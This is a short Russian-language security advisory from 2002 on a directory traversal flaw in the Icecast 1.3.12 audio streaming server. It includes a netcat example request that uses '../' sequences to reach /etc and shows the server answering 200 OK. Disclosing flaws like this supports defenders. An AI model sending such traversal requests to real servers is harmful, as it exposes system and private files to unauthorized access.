Security Lab

Доступ к произвольным файлам в Icecast

Дата публикации:12.07.2002
Всего просмотров:1248
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Icecast - сервер потокового аудио для unix и windows платформ. Обнаруженная уязвимость позволяет удаленному атакующему получить доступ к произвольным файлам на системе. Пример:
 
% nc icecast.host 8000
GET /file/../../../../../../../../etc/ HTTP/1.0

HTTP/1.0 200 OK
Server: icecast/1.3.12
Connection: close
Content-Type: text/html
Уязвимость обнаружена в Icecast 1.3.12
Ссылки: VANED LABS: icecast filesystem disclosure